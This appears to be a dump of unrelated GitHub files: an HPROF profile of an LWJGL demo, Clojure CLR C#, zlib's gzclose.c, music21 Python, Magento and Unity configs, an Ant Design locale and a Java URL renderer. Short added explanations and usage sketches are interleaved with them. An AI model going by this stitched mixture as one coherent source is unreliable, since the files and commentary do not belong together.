TRACE 28: sun.misc.JarIndex.addToList(<Unknown>:Unknown line) sun.misc.JarIndex.read(<Unknown>:Unknown line) sun.misc.JarIndex.<init>(<Unknown>:Unknown line) sun.misc.JarIndex.getJarIndex(<Unknown>:Unknown line) TRACE 60: sun.awt.image.ByteInterleavedRaster.putByteData(<Unknown>:Unknown line) sun.awt.image.ImageRepresentation.setPixels(<Unknown>:Unknown line) sun.awt.image.ImageDecoder.setPixels(<Unknown>:Unknown line) sun.awt.image.PNGImageDecoder.sendPixels(<Unknown>:Unknown line) TRACE 66: org.lwjgl.opengl.Window.swapBuffers(<Unknown>:Native method) org.lwjgl.opengl.Window.update(<Unknown>:Unknown line) Lesson11.run(Lesson11.java:72) Lesson11.main(Lesson11.java:63) TRACE 19: org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 18: java.lang.CharacterDataLatin1.toLowerCase(<Unknown>:Unknown line) java.lang.Character.toLowerCase(<Unknown>:Unknown line) java.lang.String.regionMatches(<Unknown>:Unknown line) java.net.URL.<init>(<Unknown>:Unknown line) TRACE 54: java.io.FileInputStream.open(<Unknown>:Native method) java.io.FileInputStream.<init>(<Unknown>:Unknown line) java.awt.Toolkit$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) TRACE 2: sun.net.www.ParseUtil.decode(<Unknown>:Unknown line) sun.misc.FileURLMapper.getPath(<Unknown>:Unknown line) sun.misc.FileURLMapper.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$JarLoader.getJarFile(<Unknown>:Unknown line) TRACE 27: org.lwjgl.input.Controller.nCreate(<Unknown>:Native method) org.lwjgl.input.Controller.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 65: org.lwjgl.opengl.glu.GLU.gluPerspective(<Unknown>:Unknown line) Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) 
Lesson11.run(Lesson11.java:68)
TRACE 29:
    java.lang.StringBuffer.<init>(<Unknown>:Unknown line)
    java.lang.StringBuffer.<init>(<Unknown>:Unknown line)
    sun.net.www.ParseUtil.decode(<Unknown>:Unknown line)
    sun.misc.FileURLMapper.getPath(<Unknown>:Unknown line)
TRACE 22:
    org.lwjgl.opengl.GL11.glGetInteger(<Unknown>:Unknown line)
    org.lwjgl.opengl.Util.glGetInteger(<Unknown>:Unknown line)
    org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line)
    org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line)
TRACE 75:
    Lesson11.render(Lesson11.java:144)
    Lesson11.run(Lesson11.java:71)
    Lesson11.main(Lesson11.java:63)
CPU SAMPLES BEGIN (total = 6006) Thu Jul 22 14:15:07 2004
rank   self  accum   count trace method
   1 49.22% 49.22%    2956    53 sun.awt.windows.WToolkit.eventLoop
   2 48.27% 97.49%    2899    66 org.lwjgl.opengl.Window.swapBuffers
   3  0.87% 98.35%      52    14 org.lwjgl.opengl.Window.nCreate
   4  0.23% 98.58%      14    50 sun.awt.windows.Win32SurfaceData.initDDraw
   5  0.10% 98.68%       6    79 org.lwjgl.opengl.Window.nDestroy
   6  0.10% 98.78%       6    68 org.lwjgl.opengl.GL11.glVertex3f
   7  0.08% 98.87%       5    41 sun.awt.font.NativeFontWrapper.registerFonts
   8  0.07% 98.93%       4    31 sun.awt.Win32GraphicsEnvironment.registerFontWithPlatform
   9  0.07% 99.00%       4    69 Lesson11.render
  10  0.05% 99.05%       3    67 Lesson11.render
  11  0.05% 99.10%       3    70 Lesson11.render
  12  0.05% 99.15%       3     3 java.io.WinNTFileSystem.getBooleanAttributes
  13  0.03% 99.18%       2     1 java.util.zip.ZipFile.open
  14  0.03% 99.22%       2    73 org.lwjgl.opengl.GL11.glTexCoord2f
  15  0.03% 99.25%       2    13 java.lang.ClassLoader$NativeLibrary.load
  16  0.03% 99.28%       2    54 java.io.FileInputStream.open
  17  0.03% 99.32%       2    76 org.lwjgl.opengl.GL11.glClear
  18  0.02% 99.33%       1    44 java.lang.String.substring
  19  0.02% 99.35%       1    60 sun.awt.image.ByteInterleavedRaster.putByteData
  20  0.02% 99.37%       1    56 sun.awt.SunToolkit.getImageFromHash
  21  0.02% 99.38%       1    28 sun.misc.JarIndex.addToList
  22  0.02% 99.40%       1    11 java.lang.String.lastIndexOf
  23  0.02% 99.42%       1    27 org.lwjgl.input.Controller.nCreate
  24  0.02% 99.43%       1    26 java.util.HashMap.addEntry
  25  0.02% 99.45%       1     9 sun.nio.cs.UTF_8.newDecoder
  26  0.02% 99.47%       1    24 org.lwjgl.opengl.Window.createWindow
  27  0.02% 99.48%       1    78 org.lwjgl.input.Mouse.nDestroy
  28  0.02% 99.50%       1    16 org.lwjgl.opengl.GLContext.init
  29  0.02% 99.52%       1     2 sun.net.www.ParseUtil.decode
  30  0.02% 99.53%       1    38 sun.java2d.SunGraphicsEnvironment.registerFonts
  31  0.02% 99.55%       1    29 java.lang.StringBuffer.<init>
  32  0.02% 99.57%       1    34 sun.awt.SunToolkit.<clinit>
  33  0.02% 99.58%       1    59 sun.awt.image.ByteComponentRaster.<init>
  34  0.02% 99.60%       1    35 sun.nio.cs.ISO_8859_1$Decoder.decodeArrayLoop
  35  0.02% 99.62%       1    17 java.util.zip.Inflater.inflate
  36  0.02% 99.63%       1    30 java.io.WinNTFileSystem.getBooleanAttributes
  37  0.02% 99.65%       1    32 java.lang.StringBuffer.expandCapacity
  38  0.02% 99.67%       1     4 java.io.FileInputStream.open
  39  0.02% 99.68%       1    43 java.io.Win32FileSystem.normalize
  40  0.02% 99.70%       1    75 Lesson11.render
  41  0.02% 99.72%       1    42 java.lang.StringBuffer.<init>
  42  0.02% 99.73%       1    74 org.lwjgl.opengl.GL11.glVertex3f
  43  0.02% 99.75%       1    18 java.lang.CharacterDataLatin1.toLowerCase
  44  0.02% 99.77%       1    39 java.io.WinNTFileSystem.getBooleanAttributes
  45  0.02% 99.78%       1    37 sun.awt.font.NativeFontWrapper.registerFonts
  46  0.02% 99.80%       1    52 sun.awt.windows.WToolkit.init
  47  0.02% 99.82%       1    25 org.lwjgl.input.Mouse.nCreate
  48  0.02% 99.83%       1    71 org.lwjgl.opengl.GL11.glVertex3f
  49  0.02% 99.85%       1    57 sun.awt.image.ImageFetcher.fetchloop
  50  0.02% 99.87%       1    72 org.lwjgl.input.Mouse.nPoll
  51  0.02% 99.88%       1    47 java.lang.Class.forName0
  52  0.02% 99.90%       1    77 org.lwjgl.opengl.GL11.glLoadIdentity
  53  0.02% 99.92%       1    33 sun.awt.FontProperties.initializeProperties
  54  0.02% 99.93%       1    40 java.io.WinNTFileSystem.checkAccess
  55  0.02% 99.95%       1    64 org.lwjgl.opengl.GL11.nglTexImage2D
  56  0.02% 99.97%       1    36 java.io.WinNTFileSystem.canonicalize0
  57  0.02% 99.98%       1     7 java.util.zip.ZipFile.getInputStream
  58  0.02% 100.00%      1     6 java.io.WinNTFileSystem.getBooleanAttributes
CPU SAMPLES END
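The dump above is classic HPROF CPU-sample output: numbered TRACE stacks followed by a ranked sample table. The exact invocation that produced it is not shown; a profile of this shape would typically come from the legacy HPROF agent of JDK 8 and earlier, so the command below is an assumption, not the original one:

# Hypothetical invocation; options (sampling mode, stack depth, output file) are assumed.
java -Xrunhprof:cpu=samples,depth=4,file=java.hprof.txt Lesson11

Reading the table, ranks 1 and 2 account for over 97% of samples, suggesting the run spent nearly all sampled time in the AWT event loop and in Window.swapBuffers (i.e. largely waiting on the buffer swap), not in Lesson11.render itself.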
{ "pile_set_name": "Github" }
/** * Copyright (c) Rich Hickey. All rights reserved. * The use and distribution terms for this software are covered by the * Eclipse Public License 1.0 (http://opensource.org/licenses/eclipse-1.0.php) * which can be found in the file epl-v10.html at the root of this distribution. * By using this software in any fashion, you are agreeing to be bound by * the terms of this license. * You must not remove this notice, or any other, from this software. **/ /** * Author: David Miller **/ using System; using System.Collections; namespace clojure.lang { abstract class ATransientMap : AFn, ITransientMap { #region Methods to be supplied by derived classes abstract protected void EnsureEditable(); abstract protected ITransientMap doAssoc(object key, object val); abstract protected ITransientMap doWithout(object key); abstract protected object doValAt(object key, object notFound); abstract protected int doCount(); abstract protected IPersistentMap doPersistent(); #endregion IPersistentCollection ITransientCollection.persistent() { return persistent(); } ITransientCollection ITransientCollection.conj(object val) { return conj(val); } ITransientAssociative ITransientAssociative.assoc(object key, object val) { return assoc(key, val); } public ITransientMap conj(object val) { EnsureEditable(); { IMapEntry e = val as IMapEntry; if (e != null) return assoc(e.key(), e.val()); } if (val is DictionaryEntry) { DictionaryEntry de = (DictionaryEntry)val; return assoc(de.Key, de.Value); } { IPersistentVector v = val as IPersistentVector; if (v != null) { if (v.count() != 2) throw new ArgumentException("Vector arg to map conj must be a pair"); return assoc(v.nth(0), v.nth(1)); } } // TODO: also handle KeyValuePair? ITransientMap ret = this; for (ISeq es = RT.seq(val); es != null; es = es.next()) { IMapEntry e = (IMapEntry)es.first(); ret = ret.assoc(e.key(), e.val()); } return ret; } #region IFn overloads public override object invoke(object arg1) { return valAt(arg1); } public override object invoke(object arg1, object arg2) { return valAt(arg1, arg2); } #endregion public object valAt(object key) { return valAt(key, null); } public object valAt(object key, object notFound) { EnsureEditable(); return doValAt(key, notFound); } public ITransientMap assoc(object key, object val) { EnsureEditable(); return doAssoc(key, val); } public ITransientMap without(object key) { EnsureEditable(); return doWithout(key); } public IPersistentMap persistent() { EnsureEditable(); return doPersistent(); } public int count() { EnsureEditable(); return doCount(); } } }
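A minimal C# sketch of the transient-map lifecycle this abstract class supports. PersistentHashMap.EMPTY and IEditableCollection.asTransient() are assumptions about the wider clojure.lang API, not shown in this file:

using System.Collections;
using clojure.lang;

static class TransientMapDemo
{
    static void Main()
    {
        // A transient is obtained from an editable persistent collection
        // (assumed entry point: PersistentHashMap.EMPTY + asTransient()).
        ITransientMap t = (ITransientMap)((IEditableCollection)PersistentHashMap.EMPTY).asTransient();
        t = t.assoc("a", 1);                      // EnsureEditable() then doAssoc()
        t = t.conj(new DictionaryEntry("b", 2));  // exercises the DictionaryEntry branch of conj()
        t = t.without("a");                       // EnsureEditable() then doWithout()
        IPersistentMap m = t.persistent();        // freezes the transient
        System.Console.WriteLine(m.valAt("b"));   // 2
    }
}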
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 94399ff0195a6ea42abcc5188df5ed67 timeCreated: 1502438559 licenseType: Pro MonoImporter: serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
CONSOLE_PORT=0x3f8 CONSOLE_DEV=0 CONSOLE_SPEED=115200 ONIE_PLATFORM_EXTRA_CMDLINE_LINUX="pci=noaer"
{ "pile_set_name": "Github" }
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports["default"] = void 0; var _is_IS = _interopRequireDefault(require("rc-pagination/lib/locale/is_IS")); var _is_IS2 = _interopRequireDefault(require("../date-picker/locale/is_IS")); var _is_IS3 = _interopRequireDefault(require("../time-picker/locale/is_IS")); var _is_IS4 = _interopRequireDefault(require("../calendar/locale/is_IS")); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; } var localeValues = { locale: 'is', Pagination: _is_IS["default"], DatePicker: _is_IS2["default"], TimePicker: _is_IS3["default"], Calendar: _is_IS4["default"], Table: { filterTitle: 'Afmarkanir', filterConfirm: 'Staðfesta', filterReset: 'Núllstilla', selectAll: 'Velja allt', selectInvert: 'Viðsnúa vali' }, Modal: { okText: 'Áfram', cancelText: 'Hætta við', justOkText: 'Í lagi' }, Popconfirm: { okText: 'Áfram', cancelText: 'Hætta við' }, Transfer: { searchPlaceholder: 'Leita hér', itemUnit: 'færsla', itemsUnit: 'færslur' }, Upload: { uploading: 'Hleð upp...', removeFile: 'Fjarlægja skrá', uploadError: 'Villa við að hlaða upp', previewFile: 'Forskoða skrá', downloadFile: 'Hlaða niður skrá' }, Empty: { description: 'Engin gögn' } }; var _default = localeValues; exports["default"] = _default;
{ "pile_set_name": "Github" }
/* gzclose.c -- zlib gzclose() function * Copyright (C) 2004, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* gzclose() is in a separate file so that it is linked in only if it is used. That way the other gzclose functions can be used instead to avoid linking in unneeded compression or decompression routines. */ int ZEXPORT gzclose(file) gzFile file; { #ifndef NO_GZCOMPRESS gz_statep state; if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; return state->mode == GZ_READ ? gzclose_r(file) : gzclose_w(file); #else return gzclose_r(file); #endif }
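A minimal calling-side sketch showing why gzclose() lives in its own translation unit: callers that use gzclose_r() or gzclose_w() directly let the linker drop the unused half of the library, while gzclose() keeps the convenience of mode-based dispatch.

/* Minimal sketch: write then close a gzip stream with the public gz* API. */
#include <zlib.h>

int main(void)
{
    gzFile f = gzopen("out.gz", "wb");
    if (f == NULL)
        return 1;
    gzputs(f, "hello, gzip\n");
    /* gzclose() forwards to gzclose_w() here because the stream was
       opened for writing; a read-mode stream would go to gzclose_r(). */
    return gzclose(f) == Z_OK ? 0 : 1;
}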
{ "pile_set_name": "Github" }
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Name: stream/core.py # Purpose: mixin class for the core elements of Streams # # Authors: Michael Scott Cuthbert # Christopher Ariza # # Copyright: Copyright © 2008-2015 Michael Scott Cuthbert and the music21 Project # License: BSD, see license.txt # ----------------------------------------------------------------------------- ''' the Stream Core Mixin handles the core attributes of streams that should be thought of almost as private values and not used except by advanced programmers who need the highest speed in programming. Nothing here promises to be stable. The music21 team can make any changes here for efficiency reasons while being considered backwards compatible so long as the public methods that call this remain stable. All functions here will eventually begin with `.core`. ''' # pylint: disable=attribute-defined-outside-init import unittest from music21 import spanner from music21 import tree from music21.exceptions21 import StreamException, ImmutableStreamException class StreamCoreMixin: def __init__(self): # hugely important -- keeps track of where the _elements are # the _offsetDict is a dictionary where id(element) is the # index and the index and the offset is the value. self._offsetDict = {} # self._elements stores Music21Object objects. self._elements = [] # self._endElements stores Music21Objects found at # the highestTime of this Stream. self._endElements = [] self.isSorted = True # v4! # self._elementTree = tree.trees.ElementTree(source=self) def coreInsert(self, offset, element, *, ignoreSort=False, setActiveSite=True ): ''' N.B. -- a "core" method, not to be used by general users. Run .insert() instead. A faster way of inserting elements that does no checks, just insertion. Only be used in contexts that we know we have a proper, single Music21Object. Best for usage when taking objects in a known Stream and creating a new Stream When using this method, the caller is responsible for calling Stream.coreElementsChanged after all operations are completed. Do not mix coreInsert with coreAppend operations. Returns boolean if the Stream is now sorted. ''' # environLocal.printDebug(['coreInsert', 'self', self, # 'offset', offset, 'element', element]) # need to compare highest time before inserting the element in # the elements list storeSorted = False if not ignoreSort: # # if sorted and our insertion is > the highest time, then # # are still inserted # if self.isSorted is True and self.highestTime <= offset: # storeSorted = True if self.isSorted is True: ht = self.highestTime if ht < offset: storeSorted = True elif ht == offset: if not self._elements: storeSorted = True else: highestSortTuple = self._elements[-1].sortTuple() thisSortTuple = list(element.sortTuple()) thisSortTuple[1] = offset thisSortTuple = tuple(thisSortTuple) if highestSortTuple < thisSortTuple: storeSorted = True self.setElementOffset(element, float(offset), addElement=True, setActiveSite=setActiveSite) element.sites.add(self) # need to explicitly set the activeSite of the element # will be sorted later if necessary self._elements.append(element) # self._elementTree.insert(float(offset), element) return storeSorted def coreAppend(self, element, setActiveSite=True): ''' N.B. -- a "core" method, not to be used by general users. Run .append() instead. Low level appending; like `coreInsert` does not error check, determine elements changed, or similar operations. 
When using this method, the caller is responsible for calling Stream.coreElementsChanged after all operations are completed. ''' # NOTE: this is not called by append, as that is optimized # for looping multiple elements ht = self.highestTime self.setElementOffset(element, ht, addElement=True) element.sites.add(self) # need to explicitly set the activeSite of the element if setActiveSite: self.coreSelfActiveSite(element) self._elements.append(element) # Make this faster # self._elementTree.insert(self.highestTime, element) # does not change sorted state if element.duration is not None: self._setHighestTime(ht + element.duration.quarterLength) # -------------------------------------------------------------------------- # adding and editing Elements and Streams -- all need to call coreElementsChanged # most will set isSorted to False def coreElementsChanged( self, *, updateIsFlat=True, clearIsSorted=True, memo=None, keepIndex=False): ''' NB -- a "core" stream method that is not necessary for most users. This method is called automatically any time the elements in the Stream are changed. However, it may be called manually in case sites or other advanced features of an element have been modified. It was previously a private method and for most users should still be treated as such. The various arguments permit optimizing the clearing of cached data in situations when completely dropping all cached data is excessive. >>> a = stream.Stream() >>> a.isFlat True Here we manipulate the private `._elements` storage (which generally shouldn't be done) and thus need to call `.coreElementsChanged` directly. >>> a._elements.append(stream.Stream()) >>> a.isFlat # this is wrong. True >>> a.coreElementsChanged() >>> a.isFlat False ''' # experimental if not self._mutable: raise ImmutableStreamException( '_coreElementsChanged should not be triggered on an immutable stream' ) if memo is None: memo = [] memo.append(id(self)) # WHY??? THIS SEEMS OVERKILL, esp. since the first call to .sort() in .flat will # invalidate it! TODO: Investigate if this is necessary and then remove if not necessary # should not need to do this... # if this Stream is a flat representation of something, and its # elements have changed, than we must clear the cache of that # ancestor so that subsequent calls get a new representation of this derivation; # we can do that by calling coreElementsChanged on # the derivation.origin if self._derivation is not None: sdm = self._derivation.method if sdm in ('flat', 'semiflat'): origin = self._derivation.origin if sdm in origin._cache and origin._cache[sdm] is self: del origin._cache[sdm] # may not always need to clear cache of all living sites, but may # always be a good idea since .flat has changed etc. # should not need to do derivation.origin sites. for livingSite in self.sites: livingSite.coreElementsChanged() # clear these attributes for setting later if clearIsSorted: self.isSorted = False if updateIsFlat: self.isFlat = True # do not need to look in _endElements for e in self._elements: # only need to find one case, and if so, no longer flat # fastest method here is isinstance() # if isinstance(e, Stream): if e.isStream: self.isFlat = False break # resetting the cache removes lowest and highest time storage # a slight performance optimization: not creating unless needed if self._cache: indexCache = None if keepIndex and 'index' in self._cache: indexCache = self._cache['index'] # always clear cache when elements have changed # for instance, Duration will change. 
# noinspection PyAttributeOutsideInit self._cache = {} if keepIndex and indexCache is not None: self._cache['index'] = indexCache def coreHasElementByMemoryLocation(self, objId): ''' NB -- a "core" stream method that is not necessary for most users. use hasElement(obj) Return True if an element object id, provided as an argument, is contained in this Stream. >>> s = stream.Stream() >>> n1 = note.Note('g') >>> n2 = note.Note('g#') >>> s.append(n1) >>> s.coreHasElementByMemoryLocation(id(n1)) True >>> s.coreHasElementByMemoryLocation(id(n2)) False ''' if objId in self._offsetDict: return True for e in self._elements: if id(e) == objId: # pragma: no cover return True for e in self._endElements: if id(e) == objId: # pragma: no cover return True return False def coreGetElementByMemoryLocation(self, objId): ''' NB -- a "core" stream method that is not necessary for most users. Low-level tool to get an element based only on the object id. This is not the same as getElementById, which refers to the id attribute which may be manually set and not unique. However, some implementations of python will reuse object locations, sometimes quickly, so don't keep these around. Used by spanner and variant. >>> s = stream.Stream() >>> n1 = note.Note('g') >>> n2 = note.Note('g#') >>> s.append(n1) >>> s.coreGetElementByMemoryLocation(id(n1)) is n1 True >>> s.coreGetElementByMemoryLocation(id(n2)) is None True >>> b = bar.Barline() >>> s.storeAtEnd(b) >>> s.coreGetElementByMemoryLocation(id(b)) is b True ''' # NOTE: this may be slightly faster than other approaches # as it does not sort. for e in self._elements: if id(e) == objId: return e for e in self._endElements: if id(e) == objId: return e return None # -------------------------------------------------------------------------- def coreGuardBeforeAddElement(self, element, *, checkRedundancy=True): ''' Before adding an element, this method provides important checks to that element. Used by both insert() and append() Returns None or raises a StreamException >>> s = stream.Stream() >>> s.coreGuardBeforeAddElement(s) Traceback (most recent call last): music21.exceptions21.StreamException: this Stream cannot be contained within itself ''' # using id() here b/c we do not want to get __eq__ comparisons if element is self: # cannot add this Stream into itself raise StreamException('this Stream cannot be contained within itself') if checkRedundancy: idElement = id(element) if idElement in self._offsetDict: # now go slow for safety -- maybe something is amiss in the index. # this should not happen, but we have slipped many times in not clearing out # old _offsetDict entries. for search_place in (self._elements, self._endElements): for eInStream in search_place: if eInStream is element: raise StreamException( f'the object ({element!r}, id()={id(element)} ' + f'is already found in this Stream ({self!r}, id()={id(self)})' ) # something was old... delete from _offsetDict # environLocal.warn('stale object') del self._offsetDict[idElement] # pragma: no cover # if we do not purge locations here, we may have ids() for # Streams that no longer exist stored in the locations entry for element. # Note that dead locations are also purged from .sites during # all get() calls. element.purgeLocations() def coreStoreAtEnd(self, element, setActiveSite=True): ''' NB -- this is a "core" method. Use .storeAtEnd() instead. Core method for adding end elements. To be called by other methods. 
''' self.setElementOffset(element, 'highestTime', addElement=True) element.sites.add(self) # need to explicitly set the activeSite of the element if setActiveSite: self.coreSelfActiveSite(element) # self._elements.append(element) self._endElements.append(element) @property def spannerBundle(self): ''' A low-level object for Spanner management. This is a read-only property. ''' if 'spannerBundle' not in self._cache or self._cache['spannerBundle'] is None: sf = self.flat sp = sf.spanners.stream() self._cache['spannerBundle'] = spanner.SpannerBundle(sp) return self._cache['spannerBundle'] def asTimespans(self, classList=None, flatten=True): r''' Convert stream to a :class:`~music21.tree.trees.TimespanTree` instance, a highly optimized data structure for searching through elements and offsets. >>> score = tree.makeExampleScore() >>> scoreTree = score.asTimespans() >>> print(scoreTree) <TimespanTree {20} (0.0 to 8.0) <music21.stream.Score exampleScore>> <ElementTimespan (0.0 to 0.0) <music21.clef.BassClef>> <ElementTimespan (0.0 to 0.0) <music21.meter.TimeSignature 2/4>> <ElementTimespan (0.0 to 0.0) <music21.instrument.Instrument 'PartA: : '>> <ElementTimespan (0.0 to 0.0) <music21.clef.BassClef>> <ElementTimespan (0.0 to 0.0) <music21.meter.TimeSignature 2/4>> <ElementTimespan (0.0 to 0.0) <music21.instrument.Instrument 'PartB: : '>> <PitchedTimespan (0.0 to 1.0) <music21.note.Note C>> <PitchedTimespan (0.0 to 2.0) <music21.note.Note C#>> <PitchedTimespan (1.0 to 2.0) <music21.note.Note D>> <PitchedTimespan (2.0 to 3.0) <music21.note.Note E>> <PitchedTimespan (2.0 to 4.0) <music21.note.Note G#>> <PitchedTimespan (3.0 to 4.0) <music21.note.Note F>> <PitchedTimespan (4.0 to 5.0) <music21.note.Note G>> <PitchedTimespan (4.0 to 6.0) <music21.note.Note E#>> <PitchedTimespan (5.0 to 6.0) <music21.note.Note A>> <PitchedTimespan (6.0 to 7.0) <music21.note.Note B>> <PitchedTimespan (6.0 to 8.0) <music21.note.Note D#>> <PitchedTimespan (7.0 to 8.0) <music21.note.Note C>> <ElementTimespan (8.0 to 8.0) <music21.bar.Barline type=final>> <ElementTimespan (8.0 to 8.0) <music21.bar.Barline type=final>> ''' hashedAttributes = hash((tuple(classList or ()), flatten)) cacheKey = "timespanTree" + str(hashedAttributes) if cacheKey not in self._cache or self._cache[cacheKey] is None: hashedTimespanTree = tree.fromStream.asTimespans(self, flatten=flatten, classList=classList) self._cache[cacheKey] = hashedTimespanTree return self._cache[cacheKey] def coreSelfActiveSite(self, el): ''' Set the activeSite of el to be self. Override for SpannerStorage, VariantStorage, which should never become the activeSite ''' el.activeSite = self def asTree(self, flatten=False, classList=None, useTimespans=False, groupOffsets=False): ''' Returns an elementTree of the score, using exact positioning. See tree.fromStream.asTree() for more details. 
>>> score = tree.makeExampleScore() >>> scoreTree = score.asTree(flatten=True) >>> scoreTree <ElementTree {20} (0.0 <0.-25...> to 8.0) <music21.stream.Score exampleScore>> ''' hashedAttributes = hash((tuple(classList or ()), flatten, useTimespans, groupOffsets)) cacheKey = "elementTree" + str(hashedAttributes) if cacheKey not in self._cache or self._cache[cacheKey] is None: hashedElementTree = tree.fromStream.asTree(self, flatten=flatten, classList=classList, useTimespans=useTimespans, groupOffsets=groupOffsets) self._cache[cacheKey] = hashedElementTree return self._cache[cacheKey] def coreGatherMissingSpanners(self, recurse=True, requireAllPresent=True, insert=True): ''' find all spanners that are referenced by elements in the (recursed if recurse=True) stream and either inserts them in the Stream (if insert is True) or returns them if insert is False. If requireAllPresent is True (default) then only those spanners whose complete spanned elements are in the Stream are returned. Because spanners are stored weakly in .sites this is only guaranteed to find the spanners in cases where the spanner is in another stream that is still active. Here's a little helper function since we'll make the same Stream several times: >>> def getStream(): ... s = stream.Stream() ... n = note.Note('C') ... m = note.Note('D') ... sl = spanner.Slur(n, m) ... n.bogusAttributeNotWeakref = sl # prevent garbage collecting sl ... s.append([n, m]) ... return s >>> s = getStream() >>> s.show('text') {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> Insert is False: >>> s = getStream() >>> spList = s.coreGatherMissingSpanners(insert=False) >>> spList [<music21.spanner.Slur <music21.note.Note C><music21.note.Note D>>] >>> s.show('text') {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> Not all elements are present: >>> s = getStream() >>> s.remove(s[-1]) >>> s.show('text') {0.0} <music21.note.Note C> >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> >>> s.coreGatherMissingSpanners(requireAllPresent=False) >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> Test recursion: >>> t = stream.Part() >>> s = getStream() >>> t.insert(0, s) >>> t.coreGatherMissingSpanners(recurse=False) >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> Default: with recursion: >>> t.coreGatherMissingSpanners() >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> Make sure that spanners already in the stream are not put there twice: >>> s = getStream() >>> sl = s[0].getSpannerSites()[0] >>> s.insert(0, sl) >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> And with recursion? 
>>> t = stream.Part() >>> s = getStream() >>> sl = s[0].getSpannerSites()[0] >>> s.insert(0, sl) >>> t.insert(0, s) >>> t.coreGatherMissingSpanners() >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> ''' sb = self.spannerBundle if recurse is True: sIter = self.recurse() else: sIter = self.iter collectList = [] for el in list(sIter): for sp in el.getSpannerSites(): if sp in sb: continue if sp in collectList: continue if requireAllPresent: allFound = True for spannedElement in sp.getSpannedElements(): if spannedElement not in sIter: allFound = False break if allFound is False: continue collectList.append(sp) if insert is False: return collectList else: for sp in collectList: self.coreInsert(0, sp) self.coreElementsChanged(updateIsFlat=False) # timing before: Macbook Air 2012, i7 # In [3]: timeit('s = stream.Stream()', setup='from music21 import stream', number=100000) # Out[3]: 1.6291376419831067 # after adding subclass -- actually faster, showing the rounding error: # In [2]: timeit('s = stream.Stream()', setup='from music21 import stream', number=100000) # Out[2]: 1.5247003990225494 class Test(unittest.TestCase): def runTest(self): pass if __name__ == '__main__': import music21 music21.mainTest(Test)
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ --> <sections xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="urn:magento:mftf:Page/etc/SectionObject.xsd"> <section name="AdminGridFilterControls"> <element name="filters" type="button" selector=".admin__data-grid-header[data-bind='afterRender: \$data.setToolbarNode'] button[data-action='grid-filter-expand']" timeout="5"/> <element name="applyFilters" type="button" selector="button[data-action='grid-filter-apply']" timeout="30"/> <element name="cancel" type="button" selector="button[data-action='grid-filter-cancel']" timeout="30"/> <element name="clearAll" type="button" selector="(//*[contains(@class, 'admin__data-grid-header')][contains(@data-bind, 'afterRender: \$data.setToolbarNode')]//button[contains(@data-action, 'reset')])[1]" timeout="5"/> </section> </sections>
{ "pile_set_name": "Github" }
package org.incode.module.docrendering.stringinterpolator.dom.impl; import java.io.IOException; import java.net.URL; import java.util.List; import javax.inject.Inject; import org.apache.isis.applib.services.config.ConfigurationService; import org.isisaddons.module.stringinterpolator.dom.StringInterpolatorService; import org.incode.module.docrendering.stringinterpolator.dom.spi.UrlDownloaderService; import org.incode.module.document.dom.impl.renderers.RendererFromCharsToBytes; import org.incode.module.document.dom.impl.types.DocumentType; public class RendererForStringInterpolatorCaptureUrl implements RendererFromCharsToBytes { @Override public byte[] renderCharsToBytes( final DocumentType documentType, final String variant, final String atPath, final long templateVersion, final String templateChars, final Object dataModel) throws IOException { final URL url = previewCharsToBytes(documentType, atPath, templateVersion, templateChars, dataModel); for (UrlDownloaderService downloaderService : downloaderServices) { if(downloaderService.canDownload(url)) { return downloaderService.download(url); } } throw new IllegalStateException("No downloader service available to download from " + url); } protected URL previewCharsToBytes( final DocumentType documentType, final String atPath, final long templateVersion, final String templateChars, final Object dataModel) throws IOException { final StringInterpolatorService.Root root = (StringInterpolatorService.Root) dataModel; final String urlStr = stringInterpolator.interpolate(root, templateChars); return new URL(urlStr); } @Inject List<UrlDownloaderService> downloaderServices; @Inject StringInterpolatorService stringInterpolator; @Inject ConfigurationService configurationService; }
{ "pile_set_name": "Github" }
